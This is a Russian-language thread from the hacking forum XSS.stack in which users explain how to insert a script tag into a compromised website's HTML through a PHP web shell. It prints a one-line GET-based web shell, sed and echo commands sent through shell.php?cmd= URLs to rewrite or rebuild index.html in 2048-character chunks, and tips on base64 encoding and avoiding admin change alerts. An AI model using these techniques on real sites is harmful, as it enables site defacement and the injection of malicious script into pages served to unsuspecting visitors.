Привет. Не разбираюсь в шеллах, никогда с ними не работал. Можно ли через шелл добавить тег скрипта в заголовок html?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Добавление скрипта через web shell
- Автор темы mock
- Дата начала
да много вариантов:
1)Если у шелла есть веб интерфейс, можешь скачать файл, отредактировать как надо и залить на хост, заменив старый
Если шелл примитивный через get типа
2)через вхождения найти и заменить нужный текст
3)скачать файл, отредачить и перезаписать командой
Если шелл через post запрос гораздо проще, можно одной строкой без ограничения длины
1)Если у шелла есть веб интерфейс, можешь скачать файл, отредактировать как надо и залить на хост, заменив старый
Если шелл примитивный через get типа
<pre> <?=`$_GET[cmd]`?> то:2)через вхождения найти и заменить нужный текст
sed -i 's/<h1>hello<\/h1>/<h1>xss hello<\/h1>/g' index.html, тоесть получиться http://site.com/shell.php?cmd=sed -i 's/<h1>hello<\/h1>/<h1>xss hello<\/h1>/g' index.html3)скачать файл, отредачить и перезаписать командой
echo "первая часть 2048 знаков" > index.html,и потом дописывать echo "вторая часть 2048 знаков" >> index.html и т.д (одна > перезаписывает, две >> дописывают в конец, 2048 макс длина юрл)http://site.com/shell.php?cmd=echo "первая часть 2048 знаков" > index.htmlhttp://site.com/shell.php?cmd=echo "первая часть 2048 знаков" >> index.htmlhttp://site.com/shell.php?cmd=echo "третья часть 2048 знаков" >> index.htmlЕсли шелл через post запрос гораздо проще, можно одной строкой без ограничения длины
Наверное, стоит добавить, что лучше в base64 закидывать с декодированием. Хотя, даже так не всегда все проходит гладко. Ну и, конечно, нужно помнить, что система может оповещать админа о внесении изменений в файл.
)))